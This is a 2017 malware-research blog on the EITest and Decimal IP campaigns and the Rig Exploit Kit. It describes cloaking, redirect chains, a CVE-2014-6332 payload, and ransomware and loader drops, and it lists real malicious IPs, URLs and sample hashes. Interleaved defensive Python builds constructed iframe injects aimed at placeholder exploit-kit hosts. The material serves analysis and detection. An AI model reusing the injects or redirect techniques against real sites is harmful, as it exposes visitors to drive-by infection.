Thursday, May 25, 2017

EITest's New Cloaking

First

EITest has been observed again since last night (JST), but many researchers say they cannot observe it. In short, this round of EITest seems to target only some Asian countries, including Japan.

Experiment

I accessed an EITest compromised site using IPs from various countries, and the results are as follows.

Japan (screenshot)

Hong Kong (screenshot)

UK (screenshot)

America (screenshot)

Netherlands (screenshot)

Singapore (screenshot)

Finally

I found that there are three types of EITest inject code, and they are switched by geolocation. I don't know the details, but the UK and America seem to be redirected somewhere other than RigEK, while only some Asian countries, such as Japan and Hong Kong, are redirected to RigEK.
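To turn the per-country screenshots above into something repeatable, here is an added example (not code from the original post) that groups saved copies of one compromised page by the inject they carry. It assumes you have already fetched the page through an exit in each country and kept the bodies, plus one copy of the page with no inject as a baseline. Every HTML body below is a constructed stand-in, and rig.example / other.example are placeholder hosts, not real EITest infrastructure.

```python
"""Group copies of one compromised page, fetched from different countries,
by the inject they carry.

Added example, not code from the original post. It assumes you already saved
the HTML returned to each country's IP and a copy of the page with no inject
(BASELINE). Every body below is a constructed stand-in; rig.example and
other.example are placeholder hosts, not real EITest infrastructure.
"""
import hashlib
import re
from collections import defaultdict

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
STRING_RE = re.compile(r"'[^']*'|\"[^\"]*\"")


def normalize(snippet: str) -> str:
    """Collapse per-visit noise so one inject template always hashes the same:
    string literals (hosts, random paths) become "", numbers become 0 and
    whitespace is collapsed. Identifiers are kept, so genuinely different
    templates stay apart."""
    s = STRING_RE.sub('""', snippet)
    s = re.sub(r"\b\d+\b", "0", s)
    return re.sub(r"\s+", " ", s).strip()


def extract(html: str) -> list:
    """Normalized inline <script> bodies and <iframe> tags found in html."""
    return [normalize(x) for x in SCRIPT_RE.findall(html) + IFRAME_RE.findall(html)]


def inject_signature(html: str, baseline: str) -> str:
    """Short hash of the script/iframe content present in html but not in baseline."""
    base = set(extract(baseline))
    extra = sorted({x for x in extract(html) if x and x not in base})
    if not extra:
        return "clean"
    return hashlib.sha256("\n".join(extra).encode()).hexdigest()[:12]


def group_by_inject(responses: dict, baseline: str) -> dict:
    """{signature: [countries]} with one key per inject variant seen."""
    groups = defaultdict(list)
    for country, html in responses.items():
        groups[inject_signature(html, baseline)].append(country)
    return {sig: sorted(c) for sig, c in groups.items()}


# Constructed sample data (not real captures).
BASELINE = "<html><body><script>var site = 'blog';</script><p>hello</p></body></html>"
_INJECT_A = ("<script>var q = document.createElement('iframe');"
             "q.src = 'http://rig.example/?a=1'; document.body.appendChild(q);</script>")
_INJECT_B = _INJECT_A.replace("a=1", "a=27")  # same template, different URL
_INJECT_C = "<script>window.location = 'http://other.example/land';</script>"
SAMPLE_RESPONSES = {
    "JP": BASELINE.replace("</body>", _INJECT_A + "</body>"),
    "HK": BASELINE.replace("</body>", _INJECT_B + "</body>"),
    "UK": BASELINE.replace("</body>", _INJECT_C + "</body>"),
    "US": BASELINE.replace("</body>", _INJECT_C + "</body>"),
    "NL": BASELINE,
    "SG": BASELINE,
}

if __name__ == "__main__":
    for sig, countries in group_by_inject(SAMPLE_RESPONSES, BASELINE).items():
        print(sig, countries)
```

Grouping by a normalized hash rather than by raw bytes means two copies of the same inject template that differ only in the embedded URL or numbers land in one group, so the count of groups is the count of variants. One fetch per country is a thin sample when a site also cloaks on repeat visitors, so fetch a few times from fresh addresses before trusting the grouping.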

Wednesday, May 24, 2017

Analyzing Rig Exploit Kit vol.3

First

I have introduced RigEK's behavior several times so far; this time I will introduce some changes. If you do not know the previous RigEK, please refer to the following.

https://github.com/nao-sec/RigEK/blob/master/README-en.md

Step 0

The starting point this time was a tweet by @BroadAnalysis.

EITest was observed again.

Rig Exploit Kit via EiTest campaign from 109.234.36.68 delivers Mole ransomware

I had not observed EITest since April 28. Now it has been observed again; please see the blog of @BroadAnalysis for the specific traffic.

What I will introduce this time is the change in RigEK's behavior. I had been continuously observing Decimal IP and Seamless, but I have been unable to observe them since several days ago. It seems that RigEK changed while I could not observe them.

Step 1

It starts with the familiar EITest inject code.



The EITest inject code dynamically generates an iframe and redirects the user to RigEK. Previously, this redirect returned a landing page containing obfuscated JavaScript directly to the user, but now it is different.



Let's follow the process.

Step 2

This HTML is loaded by the iframe on line 12. When the iframe is loaded, the onload event fires and start() is called. start() is as follows.



It calls getBrowser() and checks the user's fingerprint. Let's look at getBrowser().



RigEK uses the information obtained this way to check whether the user is in the target environment. If the user does not misrepresent the browser information and the browser is IE, a form tag is created and the user is sent to the next stage with an HTTP POST.

Step 3

After that, it is the same as before. The HTML containing the obfuscated JavaScript is loaded and the exploits for several vulnerabilities run. The exploit code used does not seem to have changed in particular.
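As an added example (not code from the original post or from mal_getter), here is detection logic for the change described in Step 2 and Step 3 as it looks from a proxy log: a cross-site GET of a small HTML page (the iframe), followed within seconds by a POST from the same client to the same host with that page as Referer. The log lines, the compromised.example host and the 198.51.100.23 address are constructed; the field layout (timestamp, client, method, URL, referer, status, content-type) is an assumption about your proxy format, and the POST body is not inspected because the post does not describe the form fields.

```python
"""Spot the RigEK pre-landing gate in proxy logs: an iframe GET, then a POST
back to the same host with that page as Referer.

Added example, not code from the original post or from mal_getter. LOG is a
constructed sample; the field order (ts, client, method, url, referer, status,
content-type) is an assumption about your proxy format. Hosts are documentation
names/addresses (compromised.example, 198.51.100.23), not real infrastructure.
"""
from collections import defaultdict
from urllib.parse import urlsplit

LOG = """\
1495600000 10.0.0.5 GET http://compromised.example/index.html - 200 text/html
1495600001 10.0.0.5 GET http://198.51.100.23/?zz=1 http://compromised.example/index.html 200 text/html
1495600002 10.0.0.5 POST http://198.51.100.23/?zz=1 http://198.51.100.23/?zz=1 200 text/html
1495600003 10.0.0.5 GET http://198.51.100.23/?zz=2 http://198.51.100.23/?zz=1 200 application/x-msdownload
1495600100 10.0.0.9 GET http://news.example/ - 200 text/html
1495600101 10.0.0.9 POST http://news.example/comment http://news.example/ 302 text/html
1495600200 10.0.0.7 GET http://shop.example/cart - 200 text/html
1495600201 10.0.0.7 GET http://cdn.example/widget.html http://shop.example/cart 200 text/html
1495600260 10.0.0.7 POST http://cdn.example/widget.html http://cdn.example/widget.html 200 text/html
"""


def parse_log(text: str) -> list:
    """Split the constructed one-record-per-line format into dicts."""
    records = []
    for line in text.splitlines():
        ts, client, method, url, referer, status, ctype = line.split()
        records.append({
            "ts": int(ts), "client": client, "method": method, "url": url,
            "referer": None if referer == "-" else referer,
            "status": int(status), "ctype": ctype,
        })
    return records


def _host(url: str):
    return urlsplit(url).hostname


def find_post_gates(records: list, window: int = 30) -> list:
    """Return [(client, compromised_page, gate_url)] for each suspected chain.

    A chain is: a GET of an HTML page whose Referer is on a different host
    (an injected cross-site frame), followed within `window` seconds by a
    POST from the same client to the same gate URL with the gate page as
    Referer. Same-site navigations are ignored.
    """
    per_client = defaultdict(list)
    for r in records:
        per_client[r["client"]].append(r)
    hits = []
    for client, recs in per_client.items():
        recs.sort(key=lambda r: r["ts"])
        for i, get in enumerate(recs):
            if (get["method"] != "GET" or not get["referer"]
                    or not get["ctype"].startswith("text/html")):
                continue
            if _host(get["referer"]) == _host(get["url"]):
                continue  # same-site navigation, not an injected frame
            for nxt in recs[i + 1:]:
                if nxt["ts"] - get["ts"] > window:
                    break
                if (nxt["method"] == "POST" and nxt["referer"] == get["url"]
                        and _host(nxt["url"]) == _host(get["url"])):
                    hits.append((client, get["referer"], nxt["url"]))
                    break
    return hits


if __name__ == "__main__":
    for client, page, gate in find_post_gates(parse_log(LOG)):
        print(f"{client}: {page} -> POST gate at {gate}")
```

Legitimate cross-site frames that POST back to their origin (embedded widgets, comment forms) will also match if they do so quickly, so treat this as a triage filter rather than an alert on its own; since the post describes the gate as IE-only, the client's User-Agent is the obvious second field to add.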

Finally

In this way, RigEK has changed to use a POST request. This technique is not uncommon, but it shows that RigEK is still evolving. I will continue to track RigEK.

P.S.

My mal_getter already supports this change in RigEK :)

https://github.com/nao-sec/mal_getter

Wednesday, May 17, 2017

Malware dropped by RIG(2017 Feb-Apr)

These are the malware samples dropped by RIG that I observed between February and April.
I do not know how trustworthy the timestamps are, but some of the malware was compiled just before being dropped.
Some families have older compile times.

EITest

Dreambot
  found_time (JST): 2017/02/23 8:11
  compile time: 2017:02:23 01:44:03+01:00
  tweet: https://twitter.com/nao_sec/status/834574645848272897
  VirusTotal: https://www.virustotal.com/en-gb/file/a51f24f534c3db9851fc3bea661c8b1aead926eba918c722d58a31693defb13a/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/a51f24f534c3db9851fc3bea661c8b1aead926eba918c722d58a31693defb13a
  reference: http://www.malware-traffic-analysis.net/2017/02/23/index.html

Ursnif
  found_time (JST): 2017/02/27 (2017/02/25 5:26)
  compile time: 2017:02:26 06:20:43+01:00
  tweet: https://twitter.com/nao_sec/status/835681676185382912
  VirusTotal: https://www.virustotal.com/en-gb/file/cec0a5b62eab199796b0b1f2732f40d70c7a7ad47a1bbe508e69a33528f7d4e5/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/cec0a5b62eab199796b0b1f2732f40d70c7a7ad47a1bbe508e69a33528f7d4e5
  reference: http://www.malware-traffic-analysis.net/2017/02/27/index.html

CryptoShield
  found_time (JST): 2017/02/27 1:22
  compile time: 2017:02:28 11:32:32+01:00
  tweet: https://twitter.com/nao_sec/status/835889445735817217
  VirusTotal: https://www.virustotal.com/en-gb/file/177782be48ed39b66a70c51f592f0b3ac31a8aefe5f809eb45ee9d8bb18c2946/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/177782be48ed39b66a70c51f592f0b3ac31a8aefe5f809eb45ee9d8bb18c2946
  reference: http://www.malware-traffic-analysis.net/2017/02/28/index.html

Cerber
  found_time (JST): 2017/03/18 3:07
  compile time: 2014:09:11 08:28:00+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/409a71c97dee87fbafa63e8d9025f63e7eb21dce3239b4952296db217a744264/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/409a71c97dee87fbafa63e8d9025f63e7eb21dce3239b4952296db217a744264
  reference: http://www.malware-traffic-analysis.net/2017/03/20/index.html

Spora matrix
  found_time (JST): 2017/04/06 11:11
  compile time: 2012:07:26 15:06:56+01:00, 2014:09:11 08:28:00+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/1809aa1e4d1ed14722417ee284cea229fac1c09b8c14434f7e1b2ea8547c5aeb/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/1809aa1e4d1ed14722417ee284cea229fac1c09b8c14434f7e1b2ea8547c5aeb
  reference: http://www.malware-traffic-analysis.net/2017/04/07/index.html

matrix
  found_time (JST): 2017/04/08
  compile time: 2017:04:08 04:32:16+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/efa729e2537a939a2c5e0acc81a99419d7477b6ab5fd4089bd85fd85087c9bcc/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/efa729e2537a939a2c5e0acc81a99419d7477b6ab5fd4089bd85fd85087c9bcc
  reference: http://www.malware-traffic-analysis.net/2017/04/07/index.html

matrix
  found_time (JST): 2017/04/08
  compile time: 2017:04:08 04:32:16+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/1ec63d6d3d85b014e743d291c79d5d350e13167a0343873e8303098e74c72557/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/1ec63d6d3d85b014e743d291c79d5d350e13167a0343873e8303098e74c72557

matrix
  found_time (JST): 2017/04/08
  compile time: 2017:04:08 04:19:19+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/7aeaec6fa2ac8a5d4b9f0de78c39ba978b9b3f39ad422b12d567ed730a54be47

QuantLoader Spora (two samples)
  found_time (JST): 2017/04/15 0:58
  compile time: 2016:03:09 11:15:32+01:00, 2015:10:19 04:22:40+01:00
  VirusTotal: https://www.virustotal.com/en-gb/file/f63e5ca44a32340c975bf5613b1cfd2202762e4a42f1f21deb71de18894b9304/analysis/
  VirusTotal: https://www.virustotal.com/en-gb/file/2181633d9bdb10fd4420a6aef5d5fa9e9a69ab7de4e99063ae44716188e394e1/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/f63e5ca44a32340c975bf5613b1cfd2202762e4a42f1f21deb71de18894b9304
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/2181633d9bdb10fd4420a6aef5d5fa9e9a69ab7de4e99063ae44716188e394e1
  reference: http://www.malware-traffic-analysis.net/2017/04/15/index.html

QuantLoader Spora (two samples)
  found_time (JST): 2017/04/16 (2017/04/05 7:56)
  compile time: 2017:02:26 02:21:55+01:00, 2021:01:27 12:31:12+01:00 (the latter is a future date)
  VirusTotal: https://www.virustotal.com/en-gb/file/26134f16143eb1d5fc2a13f51929166db18a9e04ea381a9bd23cabea24508879/analysis/
  VirusTotal: https://www.virustotal.com/en-gb/file/8a2eafed0b59841f76b0c23bddeb9e3cadfebba4c04a7d24694273642ffec109/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/26134f16143eb1d5fc2a13f51929166db18a9e04ea381a9bd23cabea24508879
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/8a2eafed0b59841f76b0c23bddeb9e3cadfebba4c04a7d24694273642ffec109
  reference: http://www.malware-traffic-analysis.net/2017/04/16/index.html

Spora
  found_time (JST): 2017/4/18 (2017/04/07 22:51:00)
  compile time: 2015:10:19 04:22:40+01:00
  tweet: https://twitter.com/nao_sec/status/837500077107113984
  VirusTotal: https://www.virustotal.com/en-gb/file/bab239409230dac6733cd1492b154dbdd83e2dffc38e4d95bafdec98554c11ab/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/bab239409230dac6733cd1492b154dbdd83e2dffc38e4d95bafdec98554c11ab
  reference: http://malware-traffic-analysis.net/2017/04/18/index.html

mole
  found_time (JST): 2017/04/26 10:21
  compile time: 2017:04:25 20:59:52+01:00
  tweet: https://twitter.com/nao_sec/status/857042029141819393
  VirusTotal: https://www.virustotal.com/en-gb/file/ca6624ec06c043bf9624260a7b6f437cf7c29d5909306ebd7972f113e4834ec3/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/ca6624ec06c043bf9624260a7b6f437cf7c29d5909306ebd7972f113e4834ec3

QuantLoader
  found_time (JST): 2017/04/26 13:28
  compile time: 2017:04:23 15:26:57+01:00
  tweet: https://twitter.com/nao_sec/status/857088936786747392
  VirusTotal: https://www.virustotal.com/en-gb/file/7546df1244096b3c70f7f5da33d367ce43bf4bfd397568a4adf51a23fa3cd0af/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/7546df1244096b3c70f7f5da33d367ce43bf4bfd397568a4adf51a23fa3cd0af

mole
  found_time (JST): 2017/04/27 14:28
  compile time: 2017:04:26 21:08:06+01:00
  tweet: https://twitter.com/nao_sec/status/857466502840057856
  VirusTotal: https://www.virustotal.com/en-gb/file/57d65f730b3a1d67679ea722cdb562a9e161b11cdf993ef773271589895a3572/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/57d65f730b3a1d67679ea722cdb562a9e161b11cdf993ef773271589895a3572

mole
  found_time (JST): 2017/04/28 14:40
  compile time: 2017:04:27 20:36:35+01:00
  tweet: https://twitter.com/nao_sec/status/857831871077470208
  VirusTotal: https://www.virustotal.com/en-gb/file/2cb9d2943e81b990ec737eced2e49ec556cec22c21ecc7027347485b32e63d36/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/2cb9d2943e81b990ec737eced2e49ec556cec22c21ecc7027347485b32e63d36

mole
  found_time (JST): 2017/04/28 22:56
  compile time: 2017:04:28 11:54:17+01:00
  tweet: https://twitter.com/nao_sec/status/857956617706274816
  VirusTotal: https://www.virustotal.com/en-gb/file/4ee80172598ec7826ad82d4a94c2816b079f9d0557b12d2702eed1365306ebec/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/4ee80172598ec7826ad82d4a94c2816b079f9d0557b12d2702eed1365306ebec

pseudoDarkleech

Cerber
  found_time (JST): 2017/02/22 14:39
  compile time: 2016:04:03 21:18:59+01:00
  tweet: https://twitter.com/nao_sec/status/834277482446532608
  VirusTotal: https://www.virustotal.com/en-gb/file/009cba636ff7b220efb4d24783e77af2471052ffd17fd3d721d84b82ba348af3/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/009cba636ff7b220efb4d24783e77af2471052ffd17fd3d721d84b82ba348af3
  reference: http://www.malware-traffic-analysis.net/2017/02/22/index.html

Cerber
  found_time (JST): 2017/02/27 0:31
  compile time: 2016:04:03 21:18:53+01:00
  tweet: https://twitter.com/nao_sec/status/838535748538097665
  VirusTotal: https://www.virustotal.com/en-gb/file/f7124736a95c472f4c98835786daccdbe751bbd0da4cb500fa0b35d7700d46ef/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/f7124736a95c472f4c98835786daccdbe751bbd0da4cb500fa0b35d7700d46ef
  reference: http://www.malware-traffic-analysis.net/2017/02/27/index.html

Cerber
  found_time (JST): 2017/03/20 1:08
  compile time: 2014:10:07 05:40:10+01:00
  tweet: https://twitter.com/nao_sec/status/834574488230506496
  VirusTotal: https://www.virustotal.com/en-gb/file/1c693f3448d0bd9f300f9f8d752f50db352aea7a8c1961f369291d8e6010fd0d/analysis/
  Hybrid Analysis: https://www.hybrid-analysis.com/sample/1c693f3448d0bd9f300f9f8d752f50db352aea7a8c1961f369291d8e6010fd0d
  reference: http://www.malware-traffic-analysis.net/2017/03/20/index2.html

GoodMan

Monday, May 8, 2017

Analyzing Rig Exploit Kit vol.2

First

About a month ago I wrote "Analyzing Rig Exploit Kit vol.1", but since then I have observed a payload different from the one I introduced there, so I will introduce it here.

Step 0

For RigEK's general behavior, please read the previous article first; everything up to Step 4 is the same, so I will skip it this time. Last time I introduced the payloads using CVE-2016-0189, CVE-2015-2419 and swf (I have no knowledge of swf, so I omit it this time as well).

Analyzing Rig Exploit Kit vol.1

Step 1

As before, when you deobfuscate the RigEK code, three payloads appear. The first uses the same CVE-2016-0189 as last time, the second again uses swf, and the third is the payload I introduce this time. The following is the code immediately after removing the obfuscation.

Step 2

The code is VBScript. Part of it resembles the CVE-2016-0189 payload, but let's read through it in order.

The function sdefgfss(), written at the beginning, contains some unusual binary strings; rewritten for clarity, it is the following code.

In VBScript, "&" is string concatenation; if you have studied drive-by downloads or exploit kits before, this will be familiar code. This is the function that executes "o32.tmp": the URL fetches the malware (served as x-msdownload) from RigEK, and the key is used to decode the dropped malware with RC4.
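The decode step itself, as an added example that is not the kit's own VBScript: given the key recovered from the deobfuscated payload and the x-msdownload body pulled from the capture, RC4 it and confirm that a PE comes out. SAMPLE_KEY and SAMPLE_BLOB are constructed here by encrypting a dummy DOS/PE header with the same routine, so the example runs offline; with a real capture you would pass the key string from the script and the raw response body instead.

```python
"""RC4-decrypt a RigEK drop and check that it is a PE, given the key from the
VBScript payload.

Added example; this is not the exploit kit's own code. SAMPLE_KEY and
SAMPLE_BLOB are constructed: a dummy DOS/PE header is encrypted below with
the same routine so the example runs offline. With a real capture, take the
x-msdownload body from the pcap and the key string from the deobfuscated script.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    if not key:
        raise ValueError("empty RC4 key")
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decode_drop(key: str, blob: bytes) -> bytes:
    """Decrypt blob with the script's key string and verify the MZ/PE headers.

    Raises ValueError when the result is not a PE, which is the quickest
    sign that the key (or the captured body) is wrong.
    """
    plain = rc4(key.encode("latin-1"), blob)
    if plain[:2] != b"MZ":
        raise ValueError("no MZ header after RC4: wrong key or not a PE")
    e_lfanew = int.from_bytes(plain[0x3C:0x40], "little")
    if plain[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("MZ present but PE signature missing at e_lfanew")
    return plain


# Constructed sample: a minimal DOS header whose e_lfanew points at a PE
# signature at offset 0x40. This is not a real sample.
SAMPLE_KEY = "examplekey"
_PLAIN = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 16
SAMPLE_BLOB = rc4(SAMPLE_KEY.encode("latin-1"), _PLAIN)  # what the wire would carry

if __name__ == "__main__":
    pe = decode_drop(SAMPLE_KEY, SAMPLE_BLOB)
    print("decoded", len(pe), "bytes; e_lfanew =",
          hex(int.from_bytes(pe[0x3C:0x40], "little")))
```

Checking for the PE signature at e_lfanew, not just the two MZ bytes, is worth the extra lines: with a wrong key the first two bytes come out as MZ once in 65,536 tries, and a truncated capture will decrypt cleanly and still be useless.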

Step 3

Next, let's look at the area around the function called Begin(). First it decides from the UserAgent whether the user is 32-bit or 64-bit; this attack seems to target 32-bit users. After some meaningless processing, what follows is the payload for CVE-2014-6332. Please see the following article for details.
http://malware.dontneedcoffee.com/2014/11/cve-2014-6332.html

CVE-2014-6332 is a vulnerability used in many EKs, and RigEK had incorporated it in the past as well; this time I observed it again.

Finally

Rig changed its URL parameters just the other day, and the payload may be updated as well; I will write an article if I observe it.

Have a good analysis day😉

Tuesday, May 2, 2017

Overlooking Decimal IP Campaign

It was April 26 when I first observed the Decimal IP Campaign. At that time I thought it was simply an embedded RigEK iframe, but after reading the blogs of Zerophage and Malwarebytes I noticed that it is the Decimal IP Campaign.

For the Decimal IP Campaign, please refer to the blogs of Zerophage and Malwarebytes.
https://blog.malwarebytes.com/cybercrime/2017/03/websites-compromised-decimal-ip-campaign/
https://zerophagemalware.com/2017/04/27/rig-ek-via-decimal-redirect-drops-smoke-loader/

I started investigating only a few hours ago, but I found three compromised sites. Since they were very interesting, I write up their behavior and features here.

In short, the Decimal IP Campaign does two things, and the behavior changes depending on the browser. Here I introduce the behavior when accessing with Internet Explorer and with Chrome (or Firefox).

For Internet Explorer

Please look at this. The whole flow is as follows.

When I access the compromised site in Internet Explorer, I get a "301 Moved Permanently" response that redirects to the host http://1755118211. This host is not a typo: it is a decimal IP (1755118211 is 104.156.250.131 written as a single 32-bit decimal number). It is an unfamiliar format, but the browser interprets it as an IPv4 address.
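An added helper (not from the original post) for the host form above: browsers hand numeric hosts to inet_aton-style parsing, so a bare decimal, a hex or octal spelling, and dotted forms with fewer than four parts all resolve to the same address. The function below canonicalizes them so proxy logs and redirect targets can be matched against dotted-quad indicators. 1755118211 and 104.156.250.131 are the values from this post; the compromised.example host in the test data is constructed.

```python
"""Normalize the IPv4 host spellings browsers accept to a dotted quad.

Added example, not code from the original post. It mirrors inet_aton-style
parsing: a bare 32-bit decimal such as 1755118211, hex (0x689cfa83),
octal (0150.0234.0372.0203), and dotted forms with fewer than four parts
where the last part fills the remaining bytes. Use it to canonicalize
Host/Location values before matching them against indicators.
"""
import re
from ipaddress import IPv4Address
from urllib.parse import urlsplit


def _part_value(part: str) -> int:
    """One dotted component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
        return int(part, 16)
    if re.fullmatch(r"0[0-7]+", part):
        return int(part, 8)
    if re.fullmatch(r"[0-9]+", part):
        return int(part, 10)
    raise ValueError(f"not a numeric IPv4 component: {part!r}")


def numeric_host_to_ipv4(host: str) -> str:
    """'1755118211' -> '104.156.250.131'; '0x689cfa83' and '104.156.0xfa83' too."""
    parts = host.rstrip(".").split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError("too many components")
    values = [_part_value(p) for p in parts]
    # All but the last part are single bytes; the last part covers the rest.
    for v in values[:-1]:
        if v > 0xFF:
            raise ValueError("leading component exceeds one byte")
    tail_bits = 8 * (5 - len(parts))
    if values[-1] >= (1 << tail_bits):
        raise ValueError("trailing component too large")
    n = 0
    for v in values[:-1]:
        n = (n << 8) | v
    n = (n << tail_bits) | values[-1]
    return str(IPv4Address(n))


def canonical_url_host(url: str):
    """Return (canonical_host, was_obfuscated) for the host part of url.

    Non-numeric hosts are returned unchanged with was_obfuscated=False.
    """
    h = urlsplit(url).hostname or ""
    try:
        ip = numeric_host_to_ipv4(h)
    except ValueError:
        return h, False
    return ip, ip != h


if __name__ == "__main__":
    for u in ("http://1755118211", "http://0x689cfa83/", "http://144.76.195.195/rig.php"):
        print(u, "->", canonical_url_host(u))
```

The was_obfuscated flag is the useful bit for detection: a 301 whose Location host is numeric but not a plain dotted quad is rare in legitimate traffic and is exactly what this campaign's first hop looks like.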


In this way the user is redirected to http://104.156.250.131. A "302 Found" response is returned, redirecting to http://144.76.195.195/rig.php. The HTML returned here contains an iframe pointing at RigEK, and the process flows into RigEK. RigEK itself is the same as in other campaigns, but the dropped file always seems to be Smoke Loader.

https://www.hybrid-analysis.com/sample/0f391cb9897dfd4ad91c66a7b17f28df8c82d8ece937a411394a7bee27a6e330?environmentId=100
https://www.virustotal.com/en/file/0f391cb9897dfd4ad91c66a7b17f28df8c82d8ece937a411394a7bee27a6e330/analysis/


For Chrome

Unlike IE, Chrome is not redirected to RigEK. The flow is as follows.


When accessed with Chrome, it is redirected to the decimal IP, the same as with Internet Explorer. After that, it is redirected to http://162.220.246.254 instead of http://144.76.195.195/rig.php. In this case an HTML page disguised as "Adobe Flash Player" is displayed and an exe file is downloaded. This file is Smoke Loader.

https://www.hybrid-analysis.com/sample/b1ac30b73b959603bb2c42f97bab6ca48f5a953a1fcb50bacb06f0eb5e2402c7?environmentId=100
https://www.virustotal.com/en-gb/file/b1ac30b73b959603bb2c42f97bab6ca48f5a953a1fcb50bacb06f0eb5e2402c7/analysis/


Even when I changed the exe's URL parameter "dl=1" to "dl=2", the dropped malware was the same.

---

Next, I introduce the cloaking.

The Decimal IP Campaign seems to record the IP of each user who accesses it. When a user accesses a compromised site, it looks at the user's IP and checks whether that IP has visited this compromised site or the other compromised sites before. If it has not, it performs the behavior introduced above; otherwise, it returns the normal page.

Also, the compromised site does not always redirect to the decimal IP; it may return the normal page instead. It is like round-robin: it may redirect only after several accesses.

---

That's all I have figured out in a couple of hours. I will write more as I learn more.

Have a good analysis day😉